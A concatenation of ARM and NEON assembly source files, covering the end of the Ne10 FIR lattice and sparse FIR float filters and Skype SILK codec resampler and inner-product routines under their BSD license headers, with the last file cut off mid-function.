VLD1 {dCoeff_0[],dCoeff_1[]},[pB]!
VEXT dTemp_1,dGnext_1,dTemp_1,#1
VEXT qGcurr,qGcurr,qGnext,#3
VREV64 qTemp,qTemp
@/*Next Stage*/
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
VMLA qFcurr,qGcurr,qCoeff
VMLA qGnext,qFnext,qCoeff
SUB pX,#16
@/*Store the samples in the state buffer for next frame*/
VST1 {dTemp_0,dTemp_1},[pX]!
SUBS stageCnt,#4
BGE firLatticeInnerLoop
firLatticeEndInnerLoop:
ADDS stageCnt,#4
BEQ firLatticeFinishInner
VMOV qMask,qMaskTmp
VLD1 {dCoeff_0,dCoeff_1},[pB]!
VLD1 {dGcurr_1[1]},[pX]!
VREV64 dTemp_0,dGnext_1
VBSL qMask,qCoeff,qZero
VEXT qGcurr,qGcurr,qGnext,#3
VDUP qCoeff,dMask_0[0]
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
VMLA qGnext,qFnext,qCoeff
VMLA qFcurr,qGcurr,qCoeff
VLD1 {dGcurr_1[1]},[pX]!
VDUP qCoeff,dMask_0[1]
VEXT dTemp_0,dGnext_1,dTemp_0,#1
VEXT qGcurr,qGcurr,qGnext,#3
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
VMLA qGnext,qFnext,qCoeff
VMLA qFcurr,qGcurr,qCoeff
VLD1 {dGcurr_1[1]},[pX]!
VDUP qCoeff,dMask_1[0]
VEXT dTemp_1,dGnext_1,dTemp_1,#1
VEXT qGcurr,qGcurr,qGnext,#3
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
VMLA qGnext,qFnext,qCoeff
VMLA qFcurr,qGcurr,qCoeff
VLD1 {dGcurr_1[1]},[pX]!
VDUP qCoeff,dMask_1[1]
VEXT dTemp_1,dGnext_1,dTemp_1,#1
VEXT qGcurr,qGcurr,qGnext,#3
VREV64 qTemp,qTemp
VMOV qFnext,qFcurr
VMOV qGnext,qGcurr
SUB pX,pX,#16
VMOV qMask,qMaskTmp
VMLA qFcurr,qGcurr,qCoeff
VLD1 {dTemp1_0,dTemp1_1},[pX]
VMLA qGnext,qFnext,qCoeff
VBSL qMask,qTemp,qTemp1
VST1 {dMask_0,dMask_1},[pX]
ADD pX,pX,stageCnt, LSL #2
firLatticeFinishInner:
VST1 {dFcurr_0,dFcurr_1},[pDst]!
SUBS blockSize,#4
BGE firLatticeOuterLoop
firLatticeEndOuterLoop:
ADDS blockSize,#4
BEQ firLatticeEnd
firLatticeOuterLoop1:
VLD1 {fCurr[0]},[pSrc]!
MOV pB,pCoeffs
MOV pX,pState
VLD1 {gCurr[0]},[pX]
VLD1 {Coeff[0]},[pB]!
VST1 {fCurr[0]},[pX]!
VMOV gNext,gCurr
VMLA gNext,Coeff,fCurr
VMLA fCurr,Coeff,gCurr
SUBS stageCnt,numStages,#1
BLE firLatticeEndinnerLoop1
firLatticeInnerLoop1:
VLD1 {gCurr[0]},[pX]
VST1 {gNext[0]},[pX]!
VLD1 {Coeff[0]},[pB]!
VMOV gNext,gCurr
VMLA gNext,Coeff,fCurr
VMLA fCurr,Coeff,gCurr
SUBS stageCnt,#1
BGE firLatticeInnerLoop1
firLatticeEndinnerLoop1:
VST1 {fCurr[0]},[pDst]!
SUBS blockSize,#1
BGT firLatticeOuterLoop1
firLatticeEnd:
@/*Return From Function*/
POP {r4-r12,pc}
@/*ARM Registers*/
.unreq pStateStruct
.unreq pSrc
.unreq pDst
.unreq blockSize
.unreq pState
.unreq pCoeffs
.unreq pX
.unreq pB
.unreq numStages
.unreq stageCnt
.unreq pTemp
.unreq pMask
.unreq mask
.unreq fNext
.unreq gCurr
.unreq gNext
.unreq fCurr
.unreq Coeff
@/*NEON variable Declaration*/
.unreq qFcurr
.unreq dFcurr_0
.unreq dFcurr_1
.unreq qCoeff
.unreq dCoeff_0
.unreq dCoeff_1
.unreq qZero
.unreq qMask
.unreq dMask_0
.unreq dMask_1
.unreq dOut_0
.unreq dOut_1
.unreq qAcc0
.unreq dAcc0_0
.unreq dAcc0_1
.unreq qTemp
.unreq dTemp_0
.unreq dTemp_1
.unreq qFnext
.unreq dFnext_0
.unreq dFnext_1
.unreq qGcurr
.unreq dGcurr_0
.unreq dGcurr_1
.unreq qGnext
.unreq dGnext_0
.unreq dGnext_1
.unreq qMask1
.unreq dMask1_0
.unreq dMask1_1
.unreq qMaskTmp
.unreq dMaskTmp_0
.unreq dMaskTmp_1
.unreq qTemp1
.unreq dTemp1_0
.unreq dTemp1_1
#endif
@/* ENABLE_NE10_FIR_LATTICE_FLOAT_NEON */
@/**
@ * @details
@ * This function operates on floating-point data types.
@ * There are no restrictions on numTaps and blockSize.
@ *
@ * The scratch buffer, pScratch is internally used for holding the state values temporarily.
@ * <b>Cycle Count:</b>
@ *
@ * <code> C0 * blockSize + C1 * numTaps + C2 * numTaps * blockSize</code>
@ *
@ * When the block size is >= 32, the vectorized path achieves its
@ * maximum improvement over the scalar implementation.
@ *
@ * @param[in] *S points to struct parameter
@ * @param[in] *pSrc points to the input buffer
@ * @param[out] *pDst points to the output buffer
@ * @param[out] *pScratch points to the scratch buffer
@ * @param[in] blockSize block size of filter
@ */
#ifdef ENABLE_NE10_FIR_SPARSE_FLOAT_NEON
.align 4
.global ne10_fir_sparse_float_neon
.extern ne10_qMaskTable32
.thumb
.thumb_func
ne10_fir_sparse_float_neon:
@ save the point of struct(r0) to stack for stateIndex update
PUSH {r0,r4-r11,lr}
@/*ARM Registers*/
pStateStruct .req R0
pSrc .req R1
pDst .req R2
pScratch .req R3
blockSize .req R4
size2 .req R4
pYtmp1 .req R0
pOut .req R0
Offset .req R0
readIndex .req R1
numTaps .req R5 @/* Length of the filter */
pState .req R6 @/* State pointer */
pCoeffs .req R7 @/* Coefficient pointer */
stateIndex .req R8
maxDelay .req R9
delaySize .req R9
pTapDelay .req R10
blkCnt .req R11
size1 .req R11
temp .req R1
pTemp .req R14
mask .req R11
pMask .req R11
pX .req R12
pY .req R14
pYtmp2 .req R14
@/*NEON variale Declaration*/
qInp .qn Q0.F32
dInp_0 .dn D0.F32
dInp_1 .dn D1.F32
qCoeff .qn Q1.F32
dCoeff_0 .dn D2.F32
dCoeff_1 .dn D3.F32
qZero .qn Q2.F32
qMask .qn Q3.U32
qMaskF32 .qn Q3.F32
dMask_0 .dn D6.U32
dMask_1 .dn D7.U32
qAcc0 .qn Q8.F32
dAcc0_0 .dn D16.F32
dAcc0_1 .dn D17.F32
qTemp .qn Q9.F32
dTemp_0 .dn D18.F32
dTemp_1 .dn D19.F32
qMaskTmp .qn Q10.U32
dMaskTmp_0 .dn D20.U32
dMaskTmp_1 .dn D21.U32
/*Load Mask Table*/
LDRH numTaps,[pStateStruct],#2
LDRH stateIndex,[pStateStruct],#2
LDR pState,[pStateStruct],#4
LDR pCoeffs,[pStateStruct],#4
LDRH maxDelay,[pStateStruct],#4
LDR pTapDelay,[pStateStruct],#4
@// Load blockSize from Stack
LDR blockSize,[SP,#40]
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pTemp,.L_PIC6_GOT_OFFSET
LDR pMask,.L_GOT_ne10_qMaskTable32
.L_PIC6:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_qMaskTable32
#endif
ADD delaySize,blockSize,maxDelay
VEOR qZero,qZero
AND pY,blockSize,#3
ADD pY,pMask,pY,LSL #4
VLD1 {dMaskTmp_0,dMaskTmp_1},[pY]
@/* BlockSize of Input samples are copied into the state buffer */
@/* StateIndex points to the starting position to write in the state buffer */
MOV pX,pState
LSL Offset,stateIndex,#2
SUBS blkCnt,blockSize,#1
BLT firSparseEndSrcCopy
firSparseSrcCopyLoop:
LDR pY,[pSrc],#4
STR pY,[pX,Offset]
ADD Offset,#4
CMP delaySize,Offset,LSR #2
IT LE
SUBLE Offset,Offset,delaySize, LSL #2
SUBS blkCnt,#1
BGE firSparseSrcCopyLoop
firSparseEndSrcCopy:
LSR stateIndex,Offset,#2
LDR Offset,[SP,#0]
STRH stateIndex,[Offset,#2]
LDR readIndex,[pTapDelay],#4
ADD readIndex,readIndex,blockSize
SUBS readIndex,stateIndex,readIndex
@/*Wrap arround index*/
IT LT
ADDLT readIndex,readIndex,delaySize
@/*Processing begins*/
@/*First stage*/
MOV pY,pState
MOV pX,pScratch
@/* copy the sample from the circular buffer to the destination buffer */
SUB size1,delaySize,readIndex
CMP size1,blockSize
IT GT
MOVGT size1,blockSize
ADD pYtmp1,pY,readIndex, LSL #2
SUB size2,blockSize,size1
MOV pYtmp2,pY
CMP size1,#0
BLE firSparseEndcopy1
firSparseCopy1:
LDR temp,[pYtmp1],#4
SUBS size1,#1
STR temp,[pScratch],#4
BGT firSparseCopy1
firSparseEndcopy1:
CMP size2,#0
BLE firSparseEndcopy2
firSparseCopy2:
LDR temp,[pYtmp2],#4
SUBS size2,#1
STR temp,[pScratch],#4
BGT firSparseCopy2
firSparseEndcopy2:
@// Load blockSize from Stack
LDR blockSize,[SP,#40]
MOV pOut,pDst
VLD1 {dCoeff_0[],dCoeff_1[]},[pCoeffs]!
@//CMP tapCnt,numTaps
@//Complete the case of tapCnt=numTaps
SUBS blkCnt,blockSize,#4
VLD1 {dInp_0,dInp_1},[pX]!
BLT firSparseEndInnerLoop
firSparseInnerLoop:
VMUL qAcc0,qInp,qCoeff
VLD1 {dInp_0,dInp_1},[pX]!
SUBS blkCnt,#4
VST1 {dAcc0_0,dAcc0_1},[pOut]!
BGE firSparseInnerLoop
firSparseEndInnerLoop:
ADDS blkCnt,#4
@/* If the blockSize is not a multiple of 4,
@* * compute the remaining samples */
VLD1 {dTemp_0,dTemp_1},[pOut]
VMUL qAcc0,qInp,qCoeff
VMOV qMask,qMaskTmp
VBSL qMask,qAcc0,qTemp
VST1 {dMask_0,dMask_1},[pOut]
ADD pOut,pOut,blkCnt,LSL #2
LDR readIndex,[pTapDelay],#4
ADD readIndex,readIndex,blockSize
SUBS readIndex,stateIndex,readIndex
@/*Wrap arround index*/
IT LT
ADDLT readIndex,readIndex,delaySize
SUBS numTaps,#1
BLE firSparseEnd
firSparseOuterLoop:
@// Load blockSize from Stack
LDR blockSize,[SP,#40]
MOV pY,pState
MOV pX,pScratch
@/* copy the sample from the circular buffer to the destination buffer */
SUB size1,delaySize,readIndex
CMP size1,blockSize
IT GT
MOVGT size1,blockSize
ADD pYtmp1,pY,readIndex, LSL #2
SUB size2,blockSize,size1
MOV pYtmp2,pY
CMP size1,#0
BLE firSparseEndcopy3
firSparseCopy3:
LDR temp,[pYtmp1],#4
SUBS size1,#1
STR temp,[pScratch],#4
BGT firSparseCopy3
firSparseEndcopy3:
CMP size2,#0
BLE firSparseEndcopy4
firSparseCopy4:
LDR temp,[pYtmp2],#4
SUBS size2,#1
STR temp,[pScratch],#4
BGT firSparseCopy4
firSparseEndcopy4:
@// Load blockSize from Stack
LDR blockSize,[SP,#40]
MOV pOut,pDst
VLD1 {dCoeff_0[],dCoeff_1[]},[pCoeffs]!
@//Complete the case of tapCnt=numTaps
SUBS blkCnt,blockSize,#4
VLD1 {dInp_0,dInp_1},[pX]!
VLD1 {dAcc0_0,dAcc0_1},[pOut]
BLT firSparseEndInnerLoop1
firSparseInnerLoop1:
VMLA qAcc0,qInp,qCoeff
VLD1 {dInp_0,dInp_1},[pX]!
SUBS blkCnt,#4
VST1 {dAcc0_0,dAcc0_1},[pOut]!
VLD1 {dAcc0_0,dAcc0_1},[pOut]
BGE firSparseInnerLoop1
firSparseEndInnerLoop1:
ADDS blkCnt,#4
@/* If the blockSize is not a multiple of 4,
@* * compute the remaining samples */
VMOV qMask,qMaskTmp
VBSL qMask,qInp,qZero
VMLA qAcc0,qMaskF32,qCoeff
VST1 {dAcc0_0,dAcc0_1},[pOut]
ADD pOut,pOut,blkCnt,LSL #2
LDR readIndex,[pTapDelay],#4
ADD readIndex,readIndex,blockSize
SUBS readIndex,stateIndex,readIndex
@/*Wrap arround index*/
IT LT
ADDLT readIndex,readIndex,delaySize
SUBS numTaps,#1
BGT firSparseOuterLoop
firSparseEnd:
@// Return From Function
POP {r0,r4-r11,pc}
@/*ARM Registers*/
.unreq pStateStruct
.unreq pSrc
.unreq pDst
.unreq pScratch
.unreq blockSize
.unreq size2
.unreq pYtmp1
.unreq pOut
.unreq Offset
.unreq readIndex
.unreq numTaps
.unreq pState
.unreq pCoeffs
.unreq stateIndex
.unreq maxDelay
.unreq delaySize
.unreq pTapDelay
.unreq blkCnt
.unreq size1
.unreq temp
.unreq pTemp
.unreq mask
.unreq pMask
.unreq pX
.unreq pY
.unreq pYtmp2
@/*NEON variale Declaration*/
.unreq qInp
.unreq dInp_0
.unreq dInp_1
.unreq qCoeff
.unreq dCoeff_0
.unreq dCoeff_1
.unreq qZero
.unreq qMask
.unreq qMaskF32
.unreq dMask_0
.unreq dMask_1
.unreq qAcc0
.unreq dAcc0_0
.unreq dAcc0_1
.unreq qTemp
.unreq dTemp_0
.unreq dTemp_1
.unreq qMaskTmp
.unreq dMaskTmp_0
.unreq dMaskTmp_1
#ifdef __PIC__
@/*GOT trampoline values*/
.align 4
.L_PIC0_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC0+4)
.L_PIC1_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC1+4)
.L_PIC2_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC2+4)
.L_PIC3_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC3+4)
.L_PIC4_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC4+4)
.L_PIC5_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC5+4)
.L_PIC6_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC6+4)
.L_GOT_ne10_qMaskTable32:
.word ne10_qMaskTable32(GOT)
.L_GOT_ne10_divLookUpTable:
.word ne10_divLookUpTable(GOT)
#endif
.end
#endif
@/* ENABLE_NE10_FIR_SPARSE_FLOAT_NEON */
|
open-vela/external_silk-v3-decoder | 3,564 | silk/src/SKP_Silk_resampler_private_IIR_FIR_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
VARDEF ind, r4
VARDEF tab1, r5
VARDEF tab2, r6
VARDEF tab3, _r7
VARDEF val1, r8
VARDEF val2, sb
VARDEF val3, r2
VARDEF val4, r3
VARDEF tmp1, sl
VARDEF tmp2, r2
VARDEF tmp3, r3
VARDEF tmp4, ip
VARDEF out, sl
.set sp_max_i, 0
.set sp_inc, 4
EXTERN SYM(SKP_Silk_resampler_frac_FIR_144_alt)
.globl SYM(SKP_Silk_resampler_private_IIR_FIR_INTERPOL)
SYM(SKP_Silk_resampler_private_IIR_FIR_INTERPOL):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #8
str r2, [sp, #sp_max_i]
str r3, [sp, #sp_inc]
cmp r2, #0
mov tmp3, #0xFF00
mov ind, #0
ble LR(1, f)
add tmp3, tmp3, #0xFF
L(0)
ldr tmp1, TABLE(L0, =SKP_Silk_resampler_frac_FIR_144_alt)
and tmp3, ind, tmp3
mov tmp2, #144
mov tmp4, ind, asr #16
smulwb tmp2, tmp3, tmp2
add tmp1, tmp1, tmp2, lsl #3
add tmp1, tmp1, tmp2, lsl #2
add tmp4, r1, tmp4, lsl #1
ldmia tmp1, {tab1, tab2, tab3}
ldrsh val1, [tmp4], #2
ldrsh val2, [tmp4], #2
ldrsh val3, [tmp4], #2
ldrsh val4, [tmp4], #2
smulbb out, val1, tab1
smlabt out, val2, tab1, out
ldrsh val1, [tmp4], #2
ldrsh val2, [tmp4]
smlabb out, val3, tab2, out
smlabt out, val4, tab2, out
ldr r2, [sp, #sp_max_i]
ldr r3, [sp, #sp_inc]
smlabb out, val1, tab3, out
smlabt out, val2, tab3, out
add ind, ind, r3
adds out, out, #1<<14
mov tmp3, #0xFF00
#ifdef _WINRT
bvc LR(2, f)
mvn out, #0x80000000
b LR(3, f)
L(2)
qadd out, out, out
L(3)
#else
mvnvs out, #0x80000000
qaddvc out, out, out
#endif
add tmp3, tmp3, #0xFF
mov out, out, asr #16
cmp ind, r2
strh out, [r0], #2
blt LR(0, b)
L(1)
add sp, sp, #8
ldmia sp!, {r4-r10, fp, ip, pc}
L(L0)
DCD SYM(SKP_Silk_resampler_frac_FIR_144_alt)
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 15,326 | silk/src/SKP_Silk_inner_prod_aligned_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if ( EMBEDDED_ARM >= 7 )
VARDEF len32, r3
VARDEF len32tmp, lr
VARDEF ptr1, r2
VARDEF ptr2, r1
VARDEF tmp1, r4
VARDEF tmp2, r5
VARDEFD val_0, d0
VARDEFD val_1, d1
VARDEFD val_2, d2
VARDEFD val_3, d3
VARDEFQ sum_tmp1, q2
VARDEFQ sum_tmp2, q3
VARDEFD sum_tmp1_lo, d4
VARDEFD sum_tmp1_hi, d5
.globl SYM(SKP_Silk_inner_prod_aligned)
SYM(SKP_Silk_inner_prod_aligned):
stmdb sp!, {r4-r10, fp, ip, lr}
vpush {q0-q7}
add fp, sp, #164
mov len32, r2 // put length into r3
mov ptr1, r0 // put in1 to r2
mov r0, #0 // put result to r0
// USE SL8D, SI4D
L(2)
cmp len32, #24
and len32tmp, len32, #0x7
blt LR(3, f)
vmov.i32 sum_tmp1, #0
vld1.16 {val_0, val_1}, [ptr2]!
vld1.16 {val_2, val_3}, [ptr1]!
vmov.i32 sum_tmp2, #0 // Set Q2, Q3 to 0
sub len32, len32, #16
L(0)
subs len32, len32, #8
vmlal.s16 sum_tmp1, val_0, val_2
vmlal.s16 sum_tmp2, val_1, val_3
vld1.16 {val_0, val_1}, [ptr2]!
vld1.16 {val_2, val_3}, [ptr1]!
bge LR(0, b)
vmlal.s16 sum_tmp1, val_0, val_2
vmlal.s16 sum_tmp2, val_1, val_3
vadd.s32 sum_tmp1, sum_tmp1, sum_tmp2
vadd.s32 val_0, sum_tmp1_lo, sum_tmp1_hi
vmov tmp1, tmp2, val_0
cmp len32tmp, #0 // Check if length%4 == 0
add r0, r0, tmp1
add r0, r0, tmp2
bgt LR(1, f) // Jump to process the reminder
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEFQ sum_tmp3, q1
VARDEFD sum_tmp3_lo, d2
VARDEFD sum_tmp3_hi, d3
// USE SL4D, SI4D
L(3)
cmp len32, #12
and len32tmp, len32, #0x3
movlt len32tmp, len32 // if length is not enough for SIMD.
blt LR(1, f)
vld1.16 val_0, [ptr2]!
vld1.16 val_1, [ptr1]!
vmov.i32 sum_tmp3, #0
sub len32, len32, #8
L(0)
subs len32, len32, #4
vmlal.s16 sum_tmp3, val_0, val_1
vld1.16 val_0, [ptr2]!
vld1.16 val_1, [ptr1]!
bge LR(0, b)
vmlal.s16 sum_tmp3, val_0, val_1
vadd.s32 val_0, sum_tmp3_lo, sum_tmp3_hi
vmov tmp1, tmp2, val_0
cmp len32tmp, #0 // Check if length%4 == 0
add r0, r0, tmp1
add r0, r0, tmp2
bgt LR(1, f) // Jump to process the reminder
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEF tmp0, r3
L(1)
subs len32tmp, len32tmp, #1
ldrsh tmp0, [ptr2], #2
ldrsh tmp1, [ptr1], #2
beq LR(2, f)
L(0)
smlabb r0, tmp0, tmp1, r0
ldrsh tmp0, [ptr2], #2
ldrsh tmp1, [ptr1], #2
subs len32tmp, len32tmp, #1
bgt LR(0, b)
L(2)
smlabb r0, tmp0, tmp1, r0
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEF len64, r4
VARDEF len64tmp, lr
VARDEF ptr00, r2
VARDEF ptr01, r3
VARDEFD val0, d0
VARDEFD val1, d1
VARDEFD val2, d2
VARDEFD val3, d3
VARDEFQ mul0, q2
VARDEFD mul0_lo, d4
VARDEFD mul0_hi, d5
VARDEFQ mul1, q3
VARDEFD mul1_lo, d6
VARDEFD mul1_hi, d7
VARDEFQ accu0, q4
VARDEFD accu0_lo, d8
VARDEFD accu0_hi, d9
VARDEFQ accu1, q5
VARDEFD accu1_lo, d10
VARDEFD accu1_hi, d11
.globl SYM(SKP_Silk_inner_prod16_aligned_64)
SYM(SKP_Silk_inner_prod16_aligned_64):
stmdb sp!, {r4-r10, fp, ip, lr}
vpush {q0-q7}
add fp, sp, #164
mov len64, r2
mov ptr00, r0
mov ptr01, r1
mov r0, #0 /*Output*/
mov r1, #0
// USE SL8D, SI4D
L(2)
cmp len64, #24
and len64tmp, len64, #0x7
blt LR(3, f)
vld1.16 {val0, val1}, [ptr00]!
vld1.16 {val2, val3}, [ptr01]!
vmov accu0_lo, r0, r1
vmov accu0_hi, r0, r1
vmov accu1, accu0
sub len64, len64, #16
L(0)
vmull.s16 mul0, val0, val2
vmull.s16 mul1, val1, val3
vld1.16 {val0, val1}, [ptr00]!
subs len64, len64, #8
//vqadd.s32 mul0, mul0, mul1
vld1.16 {val2, val3}, [ptr01]!
vaddw.s32 accu0, accu0, mul0_lo
vaddw.s32 accu1, accu1, mul0_hi
vaddw.s32 accu0, accu0, mul1_lo
vaddw.s32 accu1, accu1, mul1_hi
bge LR(0, b)
vmull.s16 mul0, val0, val2
vmull.s16 mul1, val1, val3
//vqadd.s32 mul0, mul0, mul1
vaddw.s32 accu0, accu0, mul0_lo
vaddw.s32 accu1, accu1, mul0_hi
vaddw.s32 accu0, accu0, mul1_lo
vaddw.s32 accu1, accu1, mul1_hi
vqadd.s64 accu0, accu0, accu1
vqadd.s64 accu0_lo, accu0_lo, accu0_hi
vmov r0, r1, accu0_lo
cmp len64tmp, #0 // Check if length%4 == 0
bgt LR(1, f) // Jump to process the reminder
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEFQ mul2, q1
VARDEFD mul2_lo, d2
VARDEFD mul2_hi, d3
VARDEFQ accu2, q2
VARDEFD accu2_lo, d4
VARDEFD accu2_hi, d5
VARDEFQ accu3, q3
// USE SL4D, SI4D
L(3)
cmp len64, #12
and len64tmp, len64, #0x3
movlt len64tmp, len64 // if length is not enough for SIMD.
blt LR(1, f)
vld1.16 val0, [ptr00]!
vld1.16 val1, [ptr01]!
vmov accu2_lo, r0, r1
vmov accu2_hi, r0, r1
vmov accu3, accu2
sub len64, len64, #8
L(0)
vmull.s16 mul2, val0, val1
vld1.16 val0, [ptr00]!
subs len64, len64, #4
vaddw.s32 accu2, accu2, mul2_lo
vld1.16 val1, [ptr01]!
vaddw.s32 accu3, accu3, mul2_hi
bge LR(0, b)
vmull.s16 mul2, val0, val1
vaddw.s32 accu2, accu2, mul2_lo
vaddw.s32 accu3, accu3, mul2_hi
vqadd.s64 accu2, accu2, accu3
vqadd.s64 accu2_lo, accu2_lo, accu2_hi
vmov r0, r1, accu2_lo
cmp len64tmp, #0
bgt LR(1, f)
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEF val4, r4
VARDEF val5, r5
L(1)
subs len64tmp, len64tmp, #1
ldrsh val4, [ptr00], #2
ldrsh val5, [ptr01], #2
beq LR(2, f)
L(0)
smlalbb r0, r1, val4, val5
ldrsh val4, [ptr00], #2
ldrsh val5, [ptr01], #2
subs len64tmp, len64tmp, #1
bgt LR(0, b)
L(2)
smlalbb r0, r1, val4, val5
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
#elif EMBEDDED_ARM >=5
/*
* SKP_Silk_inner_prod_aligned(val1_16bit[], val2_16bit[], len)
*
* Known issue:
* 1. val1_16bit and val2_16bit needs to be 16bit aligned.
* 2. result is in 32bit, no saturation, wrap around instead.
*/
VARDEF sum, r0
VARDEF val_p1, r1
VARDEF val_p2, r2
VARDEF len, r3
VARDEF val1, r4
VARDEF val2, r5
VARDEF val3, r6
#ifdef IPHONE
VARDEF val4, r8
VARDEF tmp, sb
VARDEF val5, sl
VARDEF val6, _r7
VARDEF val7, lr
VARDEF val8, ip
#else
VARDEF val4, _r7
VARDEF tmp, r8
VARDEF val5, sb
VARDEF val6, sl
VARDEF val7, lr
VARDEF val8, ip
#endif
.globl SYM(SKP_Silk_inner_prod_aligned)
SYM(SKP_Silk_inner_prod_aligned):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
cmp r2, #14
blt LR(9, f)/*LenLessThan14*/
ands tmp, r2, #1 /*check if len is a even number*/
mov len, r2
mov val_p2, r0
mov sum, #0
beq LR(0, f)/*LenEven*/
ldrsh val3, [val_p1], #2
ldrsh val4, [val_p2], #2
sub len, len, #1
smulbb sum, val3, val4
/*LenEven:*/
L(0)
ands val1, val_p1, #2 /*Check if val_p1 is LR(4, B) aligned.*/
bgt LR(1, f)/*R1Odd*/
ands val2, val_p2, #2 /*Check if val_p2 is LR(4, B) aligned*/
bgt LR(2, f)/*R2Odd*/
/*R1R2Even:*/
ands tmp, len, #3
beq LR(4, f)/*Len4*/
sub len, len, #2
ldr val1, [val_p1], #4
ldr val2, [val_p2], #4
SKP_SMLAD sum, val1, val2, sum
L(4)/*Len4:*/
ands tmp, len, #7
beq LR(8, f)/*Len8*/
ldmia val_p1!, {val1, val3}
ldmia val_p2!, {val2, val4}
sub len, len, #4
SKP_SMLAD sum, val1, val2, sum
SKP_SMLAD sum, val3, val4, sum
L(8)/*Len8:*/
ldmia val_p1!, {val1, val3, val5, val7}
ldmia val_p2!, {val2, val4, val6, val8}
L(0)
subs len, len, #8
SKP_SMLAD sum, val1, val2, sum
SKP_SMLAD sum, val3, val4, sum
SKP_SMLAD sum, val5, val6, sum
SKP_SMLAD sum, val7, val8, sum
ldmgtia val_p1!, {val1, val3, val5, val7}
ldmgtia val_p2!, {val2, val4, val6, val8}
bgt LR(0, b)
ldmia sp!, {r4-r10, fp, ip, pc}
L(2)/*R2Odd:*/
ands tmp, len, #3
beq LR(6, f)/*Len4R2Odd*/
ldr val1, [val_p1], #4
ldrsh val3, [val_p2], #2
ldrsh val4, [val_p2], #2 /*make val_p2 even*/
sub len, len, #2
smlabb sum, val1, val3, sum
smlatb sum, val1, val4, sum
